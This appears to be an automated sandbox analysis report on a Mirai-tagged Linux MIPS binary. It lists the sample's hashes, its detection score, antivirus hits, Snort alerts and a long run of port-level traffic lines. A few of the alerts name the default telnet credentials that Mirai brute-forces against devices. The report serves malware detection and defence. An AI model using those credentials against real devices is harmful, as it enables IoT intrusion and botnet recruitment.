Linux Analysis Report HCyigyiCAH


General Information

Sample Name: HCyigyiCAH
Analysis ID: 509945
MD5: 37d47c84691e35296d2eee47a3bb19c3
SHA1: afe47428ba503e1d48d58ca9e63dec079676af01
SHA256: be3c2bbc9ccb07afdb7d40068a1d4ab3911ba6e81eddc72d3e7251fbc09d5aff
Tags: 32elfmipsmirai

Most interesting Screenshot:


Score: 72
Range: 0 - 100
Whitelisted: false


Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket


AV Detection:

Multi AV Scanner detection for submitted file
Source: HCyigyiCAH Virustotal: Detection: 20% Perma Link
Source: HCyigyiCAH ReversingLabs: Detection: 25%


Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 2023433 ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0admin) ->
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login ->
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound ->
Source: Traffic Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login ->
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect ->
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login ->
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login ->
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login ->
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) ->
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound ->
Source: Traffic Snort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login ->
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login ->
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound ->
Source: Traffic Snort IDS: 492 INFO TELNET login failed ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login ->
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Source: Traffic Snort IDS: 716 INFO TELNET access ->
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48002
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48030
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48034
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47980
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48066
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48068
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48070
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48046
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48074
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48078
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48082
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48080
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48090
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48092
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48098
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48100
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48088
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48120
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48152
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45110
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45112
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45140
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45160
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45168
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45170
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45174
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45194
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45210
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: ->
Sample listens on a socket
Source: /tmp/HCyigyiCAH (PID: 5287) Socket: Jump to behavior
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48654
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48652
Source: unknown Network traffic detected: HTTP traffic on port 41494 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37760
Source: unknown Network traffic detected: HTTP traffic on port 58810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38610
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58464
Source: unknown Network traffic detected: HTTP traffic on port 52232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59314
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57378
Source: unknown Network traffic detected: HTTP traffic on port 35974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46228
Source: unknown Network traffic detected: HTTP traffic on port 46460 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45138
Source: unknown Network traffic detected: HTTP traffic on port 36772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48642
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46460
Source: unknown Network traffic detected: HTTP traffic on port 54206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35328
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58468
Source: unknown Network traffic detected: HTTP traffic on port 45226 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36664
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35324
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35566
Source: unknown Network traffic detected: HTTP traffic on port 33472 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51616 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60306
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44032
Source: unknown Network traffic detected: HTTP traffic on port 54104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38610 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35316
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51600
Source: unknown Network traffic detected: HTTP traffic on port 36324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33142
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34474
Source: unknown Network traffic detected: HTTP traffic on port 56376 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47534
Source: unknown Network traffic detected: HTTP traffic on port 41848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47770
Source: unknown Network traffic detected: HTTP traffic on port 44266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51616
Source: unknown Network traffic detected: HTTP traffic on port 47534 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36640
Source: unknown Network traffic detected: HTTP traffic on port 41678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34456
Source: unknown Network traffic detected: HTTP traffic on port 42808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34460
Source: unknown Network traffic detected: HTTP traffic on port 35984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58250
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48858
Source: unknown Network traffic detected: HTTP traffic on port 44198 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46656 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38654
Source: unknown Network traffic detected: HTTP traffic on port 37216 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59470 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57570
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58580 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 45318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50946
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55454 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37554
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34038
Source: unknown Network traffic detected: HTTP traffic on port 42600 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56248
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59522
Source: unknown Network traffic detected: HTTP traffic on port 54572 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46622 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58430
Source: unknown Network traffic detected: HTTP traffic on port 56444 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47588
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47586
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50954
Source: unknown Network traffic detected: HTTP traffic on port 47714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44074
Source: unknown Network traffic detected: HTTP traffic on port 40200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60510
Source: unknown Network traffic detected: HTTP traffic on port 56972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33180
Source: unknown Network traffic detected: HTTP traffic on port 58156 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48422
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50968
Source: unknown Network traffic detected: HTTP traffic on port 46380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48422 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35346
Source: unknown Network traffic detected: HTTP traffic on port 57884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59300
Source: unknown Network traffic detected: HTTP traffic on port 48940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34262
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59782
Source: unknown Network traffic detected: HTTP traffic on port 36096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51818
Source: unknown Network traffic detected: HTTP traffic on port 45214 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49348
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52756
Source: unknown Network traffic detected: HTTP traffic on port 37934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38450
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38452
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36274
Source: unknown Network traffic detected: HTTP traffic on port 37212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38458
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38448
Source: unknown Network traffic detected: HTTP traffic on port 43850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34096
Source: unknown Network traffic detected: HTTP traffic on port 52406 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38464 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53618
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38686
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51674
Source: unknown Network traffic detected: HTTP traffic on port 46044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38204
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38438
Source: unknown Network traffic detected: HTTP traffic on port 43386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59160
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34364 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57378 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34456 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48236
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38430
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38432
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47380
Source: unknown Network traffic detected: HTTP traffic on port 52234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45572 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42922
Source: unknown Network traffic detected: HTTP traffic on port 52276 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46042
Source: unknown Network traffic detected: HTTP traffic on port 44184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52540
Source: unknown Network traffic detected: HTTP traffic on port 35970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36486
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39512
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35396
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48218
Source: unknown Network traffic detected: HTTP traffic on port 50478 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38488 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50776
Source: unknown Network traffic detected: HTTP traffic on port 43780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38654 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38490
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38492
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39584
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36078
Source: unknown Network traffic detected: HTTP traffic on port 52978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 1872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40320
Source: unknown Network traffic detected: HTTP traffic on port 58846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51636
Source: unknown Network traffic detected: HTTP traffic on port 39818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38482
Source: unknown Network traffic detected: HTTP traffic on port 38686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42434 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38488
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43828
Source: unknown Network traffic detected: HTTP traffic on port 53278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60342
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60582
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58034
Source: unknown Network traffic detected: HTTP traffic on port 43092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59364
Source: unknown Network traffic detected: HTTP traffic on port 35852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 32898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60588
Source: unknown Network traffic detected: HTTP traffic on port 46828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54914
Source: unknown Network traffic detected: HTTP traffic on port 35396 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59378
Source: unknown Network traffic detected: HTTP traffic on port 56160 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35270 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38384 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36280
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39550
Source: unknown Network traffic detected: HTTP traffic on port 57870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49594
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38460
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52982
Source: unknown Network traffic detected: HTTP traffic on port 55370 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48260
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38464
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38466
Source: unknown Network traffic detected: HTTP traffic on port 34352 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54662 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52234
Source: unknown Network traffic detected: HTTP traffic on port 42470 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52232
Source: unknown Network traffic detected: HTTP traffic on port 44032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51146
Source: unknown Network traffic detected: HTTP traffic on port 53552 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54522 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34642 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37070
Source: unknown Network traffic detected: HTTP traffic on port 35154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57938
Source: unknown Network traffic detected: HTTP traffic on port 46386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54662
Source: unknown Network traffic detected: HTTP traffic on port 33832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36274 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41568
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43740
Source: unknown Network traffic detected: HTTP traffic on port 52856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36664 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37062
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49284
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56852
Source: unknown Network traffic detected: HTTP traffic on port 46192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43738
Source: unknown Network traffic detected: HTTP traffic on port 42482 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37298
Source: unknown Network traffic detected: HTTP traffic on port 46042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39238
Source: unknown Network traffic detected: HTTP traffic on port 50996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41548
Source: unknown Network traffic detected: HTTP traffic on port 34116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41544
Source: unknown Network traffic detected: HTTP traffic on port 34676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42470
Source: unknown Network traffic detected: HTTP traffic on port 54578 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33516
Source: unknown Network traffic detected: HTTP traffic on port 47770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46828
Source: unknown Network traffic detected: HTTP traffic on port 39550 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50662 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40040
Source: unknown Network traffic detected: HTTP traffic on port 50952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54622
Source: unknown Network traffic detected: HTTP traffic on port 44492 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59088
Source: unknown Network traffic detected: HTTP traffic on port 39584 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43780
Source: unknown Network traffic detected: HTTP traffic on port 33900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34826
Source: unknown Network traffic detected: HTTP traffic on port 58768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44624
Source: unknown Network traffic detected: HTTP traffic on port 33548 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45950
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38180
Source: unknown Network traffic detected: HTTP traffic on port 35966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53552
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35900
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54646
Source: unknown Network traffic detected: HTTP traffic on port 51154 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52472
